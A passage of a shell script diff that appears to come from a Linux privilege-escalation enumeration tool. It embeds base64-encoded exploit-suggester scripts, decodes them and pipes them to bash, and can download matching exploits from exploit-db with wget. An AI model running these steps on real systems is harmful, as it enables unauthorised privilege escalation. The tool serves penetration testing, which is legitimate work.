GFjZSBleHBsb2l0cyIKZWNobwoKZWNobyAtZSAiJHtibGR3aHR9UG9zc2libGUgRXhwbG9pdHM6JHt0eHRyc3R9IgplY2hvCgojIHN0YXJ0IGFuYWx5c2lzCmo9MApmb3IgRVhQIGluICIke0VYUExPSVRTW0BdfSIgIiR7RVhQTE9JVFNfVVNFUlNQQUNFW0BdfSI7IGRvCgogICAgIyBjcmVhdGUgYXJyYXkgZnJvbSBjdXJyZW50IGV4cGxvaXQgaGVyZSBkb2MgYW5kIGZldGNoIG5lZWRlZCBsaW5lcwogICAgaT0wCiAgICAjICgnLXInIGlzIHVzZWQgdG8gbm90IGludGVycHJldCBiYWNrc2xhc2ggdXNlZCBmb3IgYmFzaCBjb2xvcnMpCiAgICB3aGlsZSByZWFkIC1yIGxpbmUKICAgIGRvCiAgICAgICAgYXJyW2ldPSIkbGluZSIKICAgICAgICBpPSQoKGkgKyAxKSkKICAgIGRvbmUgPDw8ICIkRVhQIgoKICAgIE5BTUU9IiR7YXJyWzBdfSIgJiYgTkFNRT0iJHtOQU1FOjZ9IgogICAgUkVRUz0iJHthcnJbMV19IiAmJiBSRVFTPSIke1JFUVM6Nn0iCiAgICBUQUdTPSIke2FyclsyXX0iICYmIFRBR1M9IiR7VEFHUzo2fSIKICAgIFJBTks9IiR7YXJyWzNdfSIgJiYgUkFOSz0iJHtSQU5LOjZ9IgoKICAgICMgc3BsaXQgbGluZSB3aXRoIHJlcXVpcmVtZW50cyAmIGxvb3AgdGhydSBhbGwgcmVxcyBvbmUgYnkgb25lICYgY2hlY2sgd2hldGhlciBpdCBpcyBtZXQKICAgIElGUz0nLCcgcmVhZCAtciAtYSBhcnJheSA8PDwgIiRSRVFTIgogICAgUkVRU19OVU09JHsjYXJyYXlbQF19CiAgICBQQVNTRURfUkVRPTAKICAgIGZvciBSRVEgaW4gIiR7YXJyYXlbQF19IjsgZG8KICAgICAgICBpZiAoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIgIiR7YXJyYXlbMF19Iik7IHRoZW4KICAgICAgICAgICAgUEFTU0VEX1JFUT0kKCgkUEFTU0VEX1JFUSArIDEpKQogICAgICAgIGVsc2UKICAgICAgICAgICAgYnJlYWsKICAgICAgICBmaQogICAgZG9uZQoKICAgICMgZXhlY3V0ZSBmb3IgZXhwbG9pdHMgd2l0aCBhbGwgcmVxdWlyZW1lbnRzIG1ldAogICAgaWYgWyAkUEFTU0VEX1JFUSAtZXEgJFJFUVNfTlVNIF07IHRoZW4KCiAgICAgICAgIyBhZGRpdGlvbmFsIHJlcXVpcmVtZW50IGZvciAtLWN2ZWxpc3QtZmlsZSBtb2RlOiBjaGVjayBpZiBDVkUgYXNzb2NpYXRlZCB3aXRoIHRoZSBleHBsb2l0IGlzIG9uIHRoZSBDVkVMSVNUX0ZJTEUKICAgICAgICBpZiBbICIkb3B0X2N2ZWxpc3RfZmlsZSIgPSAidHJ1ZSIgXTsgdGhlbgoKICAgICAgICAgICAgIyBleHRyYWN0IENWRShzKSBhc3NvY2lhdGVkIHdpdGggZ2l2ZW4gZXhwbG9pdCAoYWxzbyB0cmFuc2xhdGVzICcsJyB0byAnfCcgZm9yIGVhc3kgaGFuZGxpbmcgbXVsdGlwbGUgQ1ZFcyBjYXNlIC0gdmlhIGV4dGVuZGVkIHJlZ2V4KQogICAgICAgICAgICBjdmU9JChlY2hvICIkTkFNRSIgfCBncmVwICcuKlxbLipcXS4qJyB8IGN1dCAtZCAnbScgLWYyIHwgY3V0IC1kICddJyAtZjEgfCB0ciAtZCAnWycgfCB0ciAiLCIgInwiKQogICAgICAgICAgICAjZWNobyAiQ1ZFOiAkY3ZlIgoKICAgICAgICAgICAgIyBjaGVjayBpZiBpdCdzIG9uIENWRUxJU1RfRklMRSBsaXN0LCBpZiBubyBtb3ZlIHRvIG5leHQgZXhwbG9pdAogICAgICAgICAgICBbICEgJChjYXQgIiRDVkVMSVNUX0ZJTEUiIHwgZ3JlcCAtRSAiJGN2ZSIpIF0gJiYgY29udGludWUKICAgICAgICBmaQoKICAgICAgICAjIHByb2Nlc3MgdGFncyBhbmQgaGlnaGxpZ2h0IHRob3NlIHRoYXQgbWF0Y2ggY3VycmVudCBPUyAob25seSBmb3IgZGVifHVidW50dXxSSEVMIGFuZCBpZiB3ZSBrbm93IGRpc3RybyB2ZXJzaW9uIC0gZGlyZWN0IG1vZGUpCiAgICAgICAgdGFncz0iIgogICAgICAgIGlmIFsgLW4gIiRUQUdTIiAtYSAtbiAiJE9TIiBdOyB0aGVuCiAgICAgICAgICAgIElGUz0nLCcgcmVhZCAtciAtYSB0YWdzX2FycmF5IDw8PCAiJFRBR1MiCiAgICAgICAgICAgIFRBR1NfTlVNPSR7I3RhZ3NfYXJyYXlbQF19CgogICAgICAgICAgICAjIGJ1bXAgUkFOSyBzbGlnaHRseSAoKzEpIGlmIHdlJ3JlIGluICctLXVuYW1lJyBtb2RlIGFuZCB0aGVyZSdzIGEgVEFHIGZvciBPUyBmcm9tIHVuYW1lIHN0cmluZwogICAgICAgICAgICBbICIkKGVjaG8gIiR7dGFnc19hcnJheVtAXX0iIHwgZ3JlcCAiJE9TIikiIC1hICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gInRydWUiIF0gJiYgUkFOSz0kKCgkUkFOSyArIDEpKQoKICAgICAgICAgICAgZm9yIFRBRyBpbiAiJHt0YWdzX2FycmF5W0BdfSI7IGRvCiAgICAgICAgICAgICAgICB0YWdfZGlzdHJvPSQoZWNobyAiJFRBRyIgfCBjdXQgLWQnPScgLWYxKQogICAgICAgICAgICAgICAgdGFnX2Rpc3Ryb19udW1fYWxsPSQoZWNobyAiJFRBRyIgfCBjdXQgLWQnPScgLWYyKQogICAgICAgICAgICAgICAgIyBpbiBjYXNlIG9mIHRhZyBvZiBmb3JtOiAndWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMX0gcmVtb3ZlIGtlcm5lbCB2ZXJzaW9uaW5nIHBhcnQgZm9yIGNvbXBhcmlzaW9uCiAgICAgICAgICAgICAgICB0YWdfZGlzdHJvX251bT0iJHt0YWdfZGlzdHJvX251bV9hbGwleyp9IgoKICAgICAgICAgICAgICAgICMgd2UncmUgaW4gJy0tdW5hbWUnIG1vZGUgT1IgKGZvciBub3JtYWwgbW9kZSkgaWYgdGhlcmUgaXMgZGlzdHJvIHZlcnNpb24gbWF0Y2gKICAgICAgICAgICAgICAgIGlmIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAidHJ1ZSIgLW8gXCggIiRPUyIgPT0gIiR0YWdfZGlzdHJvIiAtYSAiJChlY2hvICIkRElTVFJPIiB8IGdyZXAgLUUgIiR0YWdfZGlzdHJvX251bSIpIiBcKSBdOyB0aGVuCgogICAgICAgICAgICAgICAgICAgICMgYnVtcCBjdXJyZW50IGV4cGxvaXQncyByYW5rIGJ5IDIgZm9yIGRpc3RybyBtYXRjaCAoYW5kIG5vdCBpbiAnLS11bmFtZScgbW9kZSkKICAgICAgICAgICAgICAgICAgICBbICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gImZhbHNlIiBdICYmIFJBTks9JCgoJFJBTksgKyAyKSkKCiAgICAgICAgICAgICAgICAgICAgIyBnZXQgbmFtZSAoa2VybmVsIG9yIHBhY2thZ2UgbmFtZSkgYW5kIHZlcnNpb24gb2Yga2VybmVsL3BrZyBpZiBwcm92aWRlZDoKICAgICAgICAgICAgICAgICAgICB0YWdfcGtnPSQoZWNobyAiJHRhZ19kaXN0cm9fbnVtX2FsbCIgfCBjdXQgLWQneycgLWYgMiB8IHRyIC1kICd9JyB8IGN1dCAtZCc6JyAtZiAxKQogICAgICAgICAgICAgICAgICAgIHRhZ19wa2dfbnVtPSIiCiAgICAgICAgICAgICAgICAgICAgWyAkKGVjaG8gIiR0YWdfZGlzdHJvX251bV9hbGwiIHwgZ3JlcCAneycpIF0gJiYgdGFnX3BrZ19udW09JChlY2hvICIkdGFnX2Rpc3Ryb19udW1fYWxsIiB8IGN1dCAtZCd7JyAtZiAyIHwgdHIgLWQgJ30nIHwgY3V0IC1kJzonIC1mIDIpCgogICAgICAgICAgICAgICAgICAgICNbIC1uICIkdGFnX3BrZ19udW0iIF0gJiYgZWNobyAidGFnX3BrZ19udW06ICR0YWdfcGtnX251bTsga2VybmVsOiAkS0VSTkVMX0FMTCIKCiAgICAgICAgICAgICAgICAgICAgIyBpZiBwa2cva2VybmVsIHZlcnNpb24gaXMgbm90IHByb3ZpZGVkOgogICAgICAgICAgICAgICAgICAgIGlmIFsgLXogIiR0YWdfcGtnX251bSIgXTsgdGhlbgogICAgICAgICAgICAgICAgICAgICAgICBbICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gImZhbHNlIiBdICYmIFRBRz0iJHtsaWdodHllbGxvd31bICR7VEFHfSBdJHt0eHRyc3R9IgoKICAgICAgICAgICAgICAgICAgICAjIGtlcm5lbCB2ZXJzaW9uIHByb3ZpZGVkLCBjaGVjayBmb3IgbWF0Y2g6CiAgICAgICAgICAgICAgICAgICAgZWxpZiBbIC1uICIkdGFnX3BrZ19udW0iIC1hICIkdGFnX3BrZyIgPSAia2VybmVsIiBdOyB0aGVuCiAgICAgICAgICAgICAgICAgICAgICAgIGlmIFsgJChlY2hvICIkS0VSTkVMX0FMTCIgfCBncmVwIC1FICIke3RhZ19wa2dfbnVtfSIpIF07IHRoZW4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICMga2VybmVsIHZlcnNpb24gbWF0Y2hlZCAtIGJvbGQgaGlnaGxpZ2h0CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUQUc9IiR7eWVsbG93fVsgJHtUQUd9IF0ke3R4dHJzdH0iCgogICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBidW1wIGN1cnJlbnQgZXhwbG9pdCdzIHJhbmsgYWRkaXRpb25hbGx5IGJ5IDMgZm9yIGtlcm5lbCB2ZXJzaW9uIHJlZ2V4IG1hdGNoCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBSQU5LPSQoKCRSQU5LICsgMykpCiAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UKICAgICAgICAgICAgICAgICAgICAgICAgICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAiZmFsc2UiIF0gJiYgVEFHPSIke2xpZ2h0eWVsbG93fVsgJHRhZ19kaXN0cm89JHRhZ19kaXN0cm9fbnVtIF0ke3R4dHJzdH17a2VybmVsOiR0YWdfcGtnX251bX0iCiAgICAgICAgICAgICAgICAgICAgICAgIGZpCgogICAgICAgICAgICAgICAgICAgICMgcGtnIHZlcnNpb24gcHJvdmlkZWQsIGNoZWNrIGZvciBtYXRjaCAoVEJEKToKICAgICAgICAgICAgICAgICAgICBlbGlmIFsgLW4gIiR0YWdfcGtnX251bSIgLWEgLW4gIiR0YWdfcGtnIiAgXTsgdGhlbgogICAgICAgICAgICAgICAgICAgICAgICBUQUc9IiR7bGlnaHR5ZWxsb3d9WyAkdGFnX2Rpc3Rybz0kdGFnX2Rpc3Ryb19udW0gXSR7dHh0cnN0fXskdGFnX3BrZzokdGFnX3BrZ19udW19IgogICAgICAgICAgICAgICAgICAgIGZpCgogICAgICAgICAgICAgICAgZmkKCiAgICAgICAgICAgICAgICAjIGFwcGVuZCBjdXJyZW50IHRhZyB0byB0YWdzIGxpc3QKICAgICAgICAgICAgICAgIHRhZ3M9IiR7dGFnc30ke1RBR30sIgogICAgICAgICAgICBkb25lCiAgICAgICAgICAgICMgdHJpbSAnLCcgYWRkZWQgYnkgYWJvdmUgbG9vcAogICAgICAgICAgICBbIC1uICIkdGFncyIgXSAmJiB0YWdzPSIke3RhZ3MlP30iCiAgICAgICAgZWxzZQogICAgICAgICAgICB0YWdzPSIkVEFHUyIKICAgICAgICBmaQoKICAgICAgICAjIGluc2VydCB0aGUgbWF0Y2hlZCBleHBsb2l0ICh3aXRoIGNhbGN1bGF0ZWQgUmFuayBhbmQgaGlnaGxpZ2h0ZWQgdGFncykgdG8gYXJyYXJ5IHRoYXQgd2lsbCBiZSBzb3J0ZWQKICAgICAgICBFWFA9JChlY2hvICIkRVhQIiB8IHNlZCAtZSAnL15OYW1lOi9kJyAtZSAnL15SZXFzOi9kJyAtZSAnL15UYWdzOi9kJykKICAgICAgICBleHBsb2l0c190b19zb3J0W2pdPSIke1JBTkt9TmFtZTogJHtOQU1FfUQzTDFtUmVxczogJHtSRVFTfUQzTDFtVGFnczogJHt0YWdzfUQzTDFtJChlY2hvICIkRVhQIiB8IHNlZCAtZSAnOmEnIC1lICdOJyAtZSAnJCFiYScgLWUgJ3MvXG4vRDNMMW0vZycpIgogICAgICAgICgoaisrKSkKICAgIGZpCmRvbmUKCiMgc29ydCBleHBsb2l0cyBiYXNlZCBvbiBjYWxjdWxhdGVkIFJhbmsKSUZTPSQnXG4nClNPUlRFRF9FWFBMT0lUUz0oJChzb3J0IC1yIDw8PCIke2V4cGxvaXRzX3RvX3NvcnRbKl19IikpCnVuc2V0IElGUwoKIyBkaXNwbGF5IHNvcnRlZCBleHBsb2l0cwpmb3IgRVhQX1RFTVAgaW4gIiR7U09SVEVEX0VYUExPSVRTW0BdfSI7IGRvCgoJUkFOSz0kKGVjaG8gIiRFWFBfVEVNUCIgfCBhd2sgLUYnTmFtZTonICd7cHJpbnQgJDF9JykKCgkjIGNvbnZlcnQgZW50cnkgYmFjayB0byBjYW5vbmljYWwgZm9ybQoJRVhQPSQoZWNobyAiJEVYUF9URU1QIiB8IHNlZCAncy9eWzAtOV0vL2cnIHwgc2VkICdzL0QzTDFtL1xuL2cnKQoKCSMgY3JlYXRlIGFycmF5IGZyb20gY3VycmVudCBleHBsb2l0IGhlcmUgZG9jIGFuZCBmZXRjaCBuZWVkZWQgbGluZXMKICAgIGk9MAogICAgIyAoJy1yJyBpcyB1c2VkIHRvIG5vdCBpbnRlcnByZXQgYmFja3NsYXNoIHVzZWQgZm9yIGJhc2ggY29sb3JzKQogICAgd2hpbGUgcmVhZCAtciBsaW5lCiAgICBkbwogICAgICAgIGFycltpXT0iJGxpbmUiCiAgICAgICAgaT0kKChpICsgMSkpCiAgICBkb25lIDw8PCAiJEVYUCIKCiAgICBOQU1FPSIke2FyclswXX0iICYmIE5BTUU9IiR7TkFNRTo2fSIKICAgIFJFUVM9IiR7YXJyWzFdfSIgJiYgUkVRUz0iJHtSRVFTOjZ9IgogICAgVEFHUz0iJHthcnJbMl19IiAmJiB0YWdzPSIke1RBR1M6Nn0iCgoJRVhQTE9JVF9EQj0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiZXhwbG9pdC1kYjogIiB8IGF3ayAne3ByaW50ICQyfScpCglhbmFseXNpc191cmw9JChlY2hvICIkRVhQIiB8IGdyZXAgImFuYWx5c2lzLXVybDogIiB8IGF3ayAne3ByaW50ICQyfScpCglleHRfdXJsPSQoZWNobyAiJEVYUCIgfCBncmVwICJleHQtdXJsOiAiIHwgYXdrICd7cHJpbnQgJDJ9JykKCWNvbW1lbnRzPSQoZWNobyAiJEVYUCIgfCBncmVwICJDb21tZW50czogIiB8IGN1dCAtZCcgJyAtZiAyLSkKCXJlcXM9JChlY2hvICIkRVhQIiB8IGdyZXAgIlJlcXM6ICIgfCBjdXQgLWQnICcgLWYgMikKCgkjIGV4cGxvaXQgbmFtZSB3aXRob3V0IENWRSBudW1iZXIgYW5kIHdpdGhvdXQgY29tbW9ubHkgdXNlZCBzcGVjaWFsIGNoYXJzCgluYW1lPSQoZWNobyAiJE5BTUUiIHwgY3V0IC1kJyAnIC1mIDItIHwgdHIgLWQgJyAoKS8nKQoKCWJpbl91cmw9JChlY2hvICIkRVhQIiB8IGdyZXAgImJpbi11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKQoJc3JjX3VybD0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAic3JjLXVybDogIiB8IGF3ayAne3ByaW50ICQyfScpCglbIC16ICIkc3JjX3VybCIgXSAmJiBbIC1uICIkRVhQTE9JVF9EQiIgXSAmJiBzcmNfdXJsPSJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9kb3dubG9hZC8kRVhQTE9JVF9EQiIKCVsgLXogIiRzcmNfdXJsIiBdICYmIFsgLXogIiRiaW5fdXJsIiBdICYmIGV4aXRXaXRoRXJyTXNnICInc3JjLXVybCcgLyAnYmluLXVybCcgLyAnZXhwbG9pdC1kYicgZW50cmllcyBhcmUgYWxsIGVtcHR5IGZvciAnJE5BTUUnIGV4cGxvaXQgLSBmaXggdGhhdC4gQWJvcnRpbmcuIgoKCWlmIFsgLW4gIiRhbmFseXNpc191cmwiIF07IHRoZW4KICAgICAgICBkZXRhaWxzPSIkYW5hbHlzaXNfdXJsIgoJZWxpZiAkKGVjaG8gIiRzcmNfdXJsIiB8IGdyZXAgLXEgJ3d3dy5leHBsb2l0LWRiLmNvbScpOyB0aGVuCiAgICAgICAgZGV0YWlscz0iaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvJEVYUExPSVRfREIvIgoJZWxpZiBbWyAiJHNyY191cmwiID1+IF4uKnRnenx0YXIuZ3p8emlwJCAmJiAtbiAiJEVYUExPSVRfREIiIF1dOyB0aGVuCiAgICAgICAgZGV0YWlscz0iaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvJEVYUExPSVRfREIvIgoJZWxzZQogICAgICAgIGRldGFpbHM9IiRzcmNfdXJsIgoJZmkKCgkjIHNraXAgRG9TIGJ5IGRlZmF1bHQKCWRvcz0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAtbyAtaSAiKGRvcyIpCglbICIkb3B0X3Nob3dfZG9zIiA9PSAiZmFsc2UiIF0gJiYgWyAtbiAiJGRvcyIgXSAmJiBjb250aW51ZQoKCSMgaGFuZGxlcyAtLWZldGNoLWJpbmFyaWVzIG9wdGlvbgoJaWYgWyAkb3B0X2ZldGNoX2JpbnMgPSAidHJ1ZSIgXTsgdGhlbgogICAgICAgIGZvciBpIGluICQoZWNobyAiJEVYUCIgfCBncmVwICJiaW4tdXJsOiAiIHwgYXdrICd7cHJpbnQgJDJ9Jyk7IGRvCiAgICAgICAgICAgIFsgLWYgIiR7bmFtZX1fJChiYXNlbmFtZSAkaSkiIF0gJiYgcm0gLWYgIiR7bmFtZX1fJChiYXNlbmFtZSAkaSkiCiAgICAgICAgICAgIHdnZXQgLXEgLWsgIiRpIiAtTyAiJHtuYW1lfV8kKGJhc2VuYW1lICRpKSIKICAgICAgICBkb25lCiAgICBmaQoKCSMgaGFuZGxlcyAtLWZldGNoLXNvdXJjZXMgb3B0aW9uCglpZiBbICRvcHRfZmV0Y2hfc3JjcyA9ICJ0cnVlIiBdOyB0aGVuCiAgICAgICAgWyAtZiAiJHtuYW1lfV8kKGJhc2VuYW1lICRzcmNfdXJsKSIgXSAmJiBybSAtZiAiJHtuYW1lfV8kKGJhc2VuYW1lICRzcmNfdXJsKSIKICAgICAgICB3Z2V0IC1xIC1rICIkc3JjX3VybCIgLU8gIiR7bmFtZX1fJChiYXNlbmFtZSAkc3JjX3VybCkiICYKICAgIGZpCgogICAgIyBkaXNwbGF5IHJlc3VsdCAoc2hvcnQpCglpZiBbICIkb3B0X3N1bW1hcnkiID0gInRydWUiIF07IHRoZW4KCVsgLXogIiR0YWdzIiBdICYmIHRhZ3M9Ii0iCgllY2hvIC1lICIkTkFNRSB8fCAkdGFncyB8fCAkc3JjX3VybCIKCWNvbnRpbnVlCglmaQoKIyBkaXNwbGF5IHJlc3VsdCAoc3RhbmRhcmQpCgllY2hvIC1lICJbK10gJE5BTUUiCgllY2hvIC1lICJcbiAgIERldGFpbHM6ICRkZXRhaWxzIgogICAgICAgIGVjaG8gLWUgIiAgIEV4cG9zdXJlOiAkKGRpc3BsYXlFeHBvc3VyZSAkUkFOSykiCiAgICAgICAgWyAtbiAiJHRhZ3MiIF0gJiYgZWNobyAtZSAiICAgVGFnczogJHRhZ3MiCiAgICAgICAgZWNobyAtZSAiICAgRG93bmxvYWQgVVJMOiAkc3JjX3VybCIKICAgICAgICBbIC1uICIkZXh0X3VybCIgXSAmJiBlY2hvIC1lICIgICBleHQtdXJsOiAkZXh0X3VybCIKICAgICAgICBbIC1uICIkY29tbWVudHMiIF0gJiYgZWNobyAtZSAiICAgQ29tbWVudHM6ICRjb21tZW50cyIKCiAgICAgICAgIyBoYW5kbGVzIC0tZnVsbCBmaWx0ZXIgb3B0aW9uCiAgICAgICAgaWYgWyAiJG9wdF9mdWxsIiA9ICJ0cnVlIiBdOyB0aGVuCiAgICAgICAgICAgIFsgLW4gIiRyZXFzIiBdICYmIGVjaG8gLWUgIiAgIFJlcXVpcmVtZW50czogJHJlcXMiCgogICAgICAgICAgICBbIC1uICIkRVhQTE9JVF9EQiIgXSAmJiBlY2hvIC1lICIgICBleHBsb2l0LWRiOiAkRVhQTE9JVF9EQiIKCiAgICAgICAgICAgIGF1dGhvcj0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiYXV0aG9yOiAiIHwgY3V0IC1kJyAnIC1mIDItKQogICAgICAgICAgICBbIC1uICIkYXV0aG9yIiBdICYmIGVjaG8gLWUgIiAgIGF1dGhvcjogJGF1dGhvciIKICAgICAgICBmaQoKICAgICAgICBlY2hvCgpkb25lCg==" echo $les_b64 | base64 -d | bash echo "" - fi +fi - if [ "$(command -v perl 2>/dev/null)" ]; then +if [ "$(command -v perl 2>/dev/null)" ]; then print_2title "Executing Linux Exploit Suggester 2" print_info "https://github.com/jondonas/linux-exploit-suggester-2" les2_b64="IyEvdXNyL2Jpbi9wZXJsCnVzZSBzdHJpY3Q7CnVzZSB3YXJuaW5nczsKdXNlIEdldG9wdDo6U3RkOwoKb3VyICRWRVJTSU9OID0gJzInOwoKbXkgJW9wdHM7CmdldG9wdHMoICdrOmhkJywgXCVvcHRzICk7CmlmIChleGlzdHMgJG9wdHN7aH0pIHsKICAgIHVzYWdlKCk7CiAgICBleGl0Owp9OwoKcHJpbnRfYmFubmVyKCk7Cm15ICggJGtob3N0LCAkaXNfcGFydGlhbCApID0gZ2V0X2tlcm5lbCgpOwpwcmludCAiICBMb2NhbCBLZXJuZWw6IFxlWzAwOzMzbSRraG9zdFxlWzAwbVxuIjsKCm15ICVleHBsb2l0cyA9IGdldF9leHBsb2l0cygpOwpwcmludCAnICBTZWFyY2hpbmcgJyAuIHNjYWxhciBrZXlzKCVleHBsb2l0cykgLiAiIGV4cGxvaXRzLi4uXG5cbiI7CnByaW50ICIgIFxlWzE7MzVtUG9zc2libGUgRXhwbG9pdHNcZVswMG1cbiI7CgpteSAkY291bnQgPSAxOwpteSBAYXBwbGljYWJsZSA9ICgpOwpFWFBMT0lUOgpmb3JlYWNoIG15ICRrZXkgKCBzb3J0IGtleXMgJWV4cGxvaXRzICkgewogICAgZm9yZWFjaCBteSAka2VybmVsICggQHsgJGV4cGxvaXRzeyRrZXl9e3Z1bG59IH0gKSB7CgogICAgICAgIGlmICggICAgICRraG9zdCBlcSAka2VybmVsCiAgICAgICAgICAgICAgb3IgKCAkaXNfcGFydGlhbCBhbmQgaW5kZXgoJGtlcm5lbCwka2hvc3QpID09IDAgKQogICAgICAgICkgewogICAgICAgICAgICAkZXhwbG9pdHN7JGtleX17a2V5fSA9ICRrZXk7CiAgICAgICAgICAgIHB1c2goQGFwcGxpY2FibGUsICRleHBsb2l0c3ska2V5fSk7CiAgICAgICAgICAgIHByaW50ICIgIFxlWzAwOzMzbVtcZVswMG1cZVswMDszMW0kY291bnRcZVswMG1cZVswMDszM21dXGVbMDBtICI7CiAgICAgICAgICAgIHByaW50ICJcZVswMDszM20ka2V5XGVbMDBtIjsKICAgICAgICAgICAgcHJpbnQgIiBcZVswMDszM20oJGtlcm5lbClcZVswMG0iIGlmICRpc19wYXJ0aWFsOwoKICAgICAgICAgICAgbXkgJGFsdCA9ICRleHBsb2l0c3ska2V5fXthbHR9OwogICAgICAgICAgICBteSAkY3ZlID0gJGV4cGxvaXRzeyRrZXl9e2N2ZX07CiAgICAgICAgICAgIG15ICRtbHcgPSAkZXhwbG9pdHN7JGtleX17bWlsfTsKICAgICAgICAgICAgaWYgKCAkYWx0IG9yICRjdmUgKSB7CiAgICAgICAgICAgICAgICBwcmludCAiXG4iOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGlmICggJGFsdCApIHsgcHJpbnQgIiAgICAgIEFsdDogJGFsdCAiOyB9CiAgICAgICAgICAgIGlmICggJGN2ZSApIHsgcHJpbnQgIiAgICAgIENWRS0kY3ZlIjsgfQogICAgICAgICAgICBpZiAoICRtbHcgKSB7IHByaW50ICJcbiAgICAgIFNvdXJjZTogJG1sdyI7IH0KICAgICAgICAgICAgcHJpbnQgIlxuIjsKICAgICAgICAgICAgJGNvdW50ICs9IDE7CiAgICAgICAgICAgIG5leHQgRVhQTE9JVDsKICAgICAgICB9CiAgICB9Cn0KcHJpbnQgIlxuIjsKCmlmICghQGFwcGxpY2FibGUpIHsKICAgIHByaW50ICIgIE5vIGV4cGxvaXRzIGFyZSBhdmFpbGFibGUgZm9yIHRoaXMga2VybmVsIHZlcnNpb25cblxuIjsKICAgIGV4aXQ7Cn0KCmlmIChleGlzdHMgJG9wdHN7ZH0pIHsKICAgIHByaW50ICIgIFxlWzE7MzZtRXhwbG9pdCBEb3dubG9hZFxlWzAwbVxuIjsKICAgIHByaW50ICIgIChEb3dubG9hZCBhbGw6IFxlWzAwOzMzbSdhJ1xlWzAwbSAvIEluZGl2aWR1YWxseTogXGVbMDA7MzNtJzIsNCw1J1xlWzAwbSAiOwogICAgcHJpbnQgIi8gRXhpdDogXGVbMDA7MzNtXmNcZVswMG0pXG4iOwogICAgcHJpbnQgIiAgU2VsZWN0IGV4cGxvaXRzIHRvIGRvd25sb2FkOiAiOwoKICAgIHdoaWxlICgxKSB7CiAgICAgICAgbXkgJGlucHV0ID0gPFNURElOPjsKICAgICAgICAkaW5wdXQgPX4gcy9ccysvL2c7CgogICAgICAgIGlmICgkaW5wdXQgPX4gL15hJC8pIHsKICAgICAgICAgICAgbXkgQHNlbGVjdGVkID0gKCk7CiAgICAgICAgICAgIGZvciAobXkgJGk9MTsgJGkgPD0gc2NhbGFyIEBhcHBsaWNhYmxlOyAkaSsrKSB7CiAgICAgICAgICAgICAgIHB1c2goQHNlbGVjdGVkLCAkaSk7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZG93bmxvYWRfZXhwbG9pdHMoXEBzZWxlY3RlZCwgXEBhcHBsaWNhYmxlKTsKICAgICAgICAgICAgbGFzdDsKICAgICAgICB9CiAgICAgICAgZWxzaWYgKCRpbnB1dCA9fiAvXigwfFsxLTldWzAtOV0qKSgsKDB8WzEtOV1bMC05XSopKSokLykgewogICAgICAgICAgICBteSBAc2VsZWN0ZWQgPSB1bmlxKHNwbGl0KCcsJywgJGlucHV0KSk7CiAgICAgICAgICAgIEBzZWxlY3RlZCA9IHNvcnQgeyRhIDw9PiAkYn0gQHNlbGVjdGVkOwogICAgICAgICAgICBpZiAoJHNlbGVjdGVkWzBdID4gMCAmJiAkc2VsZWN0ZWRbLTFdIDw9IHNjYWxhciBAYXBwbGljYWJsZSkgewogICAgICAgICAgICAgICAgZG93bmxvYWRfZXhwbG9pdHMoXEBzZWxlY3RlZCwgXEBhcHBsaWNhYmxlKTsKICAgICAgICAgICAgICAgIGxhc3Q7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZWxzZSB7CiAgICAgICAgICAgICAgIHByaW50ICIgIFxlWzAwOzMxbUlucHV0IGlzIG91dCBvZiByYW5nZS5cZVswMG0gU2VsZWN0IGV4cGxvaXRzIHRvIGRvd25sb2FkOiAiOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIGVsc2UgewogICAgICAgICAgICBwcmludCAiICBcZVswMDszMW1JbnZhbGlkIGlucHV0LlxlWzAwbSBTZWxlY3QgZXhwbG9pdHMgdG8gZG93bmxvYWQ6ICI7CiAgICAgICAgfQogICAgfQp9OwpleGl0OwoKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIyBleHRyYSBmdW5jdGlvbnMgICMjCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKCnN1YiBnZXRfa2VybmVsIHsKICAgIG15ICRraG9zdCA9ICcnOwoKICAgIGlmICggZXhpc3RzICRvcHRze2t9ICkgewogICAgICAgICRraG9zdCA9ICRvcHRze2t9OwogICAgfQogICAgZWxzZSB7CiAgICAgICAgJGtob3N0ID0gYHVuYW1lIC1yIHxjdXQgLWQiLSIgLWYxYDsKICAgICAgICBjaG9tcCAka2hvc3Q7CiAgICB9CgogICAgaWYgKCFkZWZpbmVkICRraG9zdCB8fCAhKCRraG9zdCA9fiAvXlswLTldKyhbLl1bMC05XSspKiQvKSkgewogICAgICAgIHByaW50ICIgIFxlWzAwOzMxbVNwZWNpZmllZCBrZXJuZWwgaXMgaW4gdGhlIHdyb25nIGZvcm1hdFxlWzAwbVxuIjsKICAgICAgICBwcmludCAiICBUcnkgYSBrZXJuZWwgZm9ybWF0IGxpa2UgdGhpczogMy4yLjBcblxuIjsKICAgICAgICBleGl0OwogICAgfQoKICAgICMgcGFydGlhbCBrZXJuZWxzIG1pZ2h0IGJlIHByb3ZpZGVkIGJ5IHRoZSB1c2VyLAogICAgIyBzdWNoIGFzICcyLjQnIG9yICcyLjYuJwogICAgbXkgJGlzX3BhcnRpYWwgPSAka2hvc3QgPX4gL15cZCtcLlxkK1wuXGQ/LyA/IDAgOiAxOwogICAgcmV0dXJuICggJGtob3N0LCAkaXNfcGFydGlhbCApOwp9CgpzdWIgZG93bmxvYWRfZXhwbG9pdHMgewogICAgbXkgK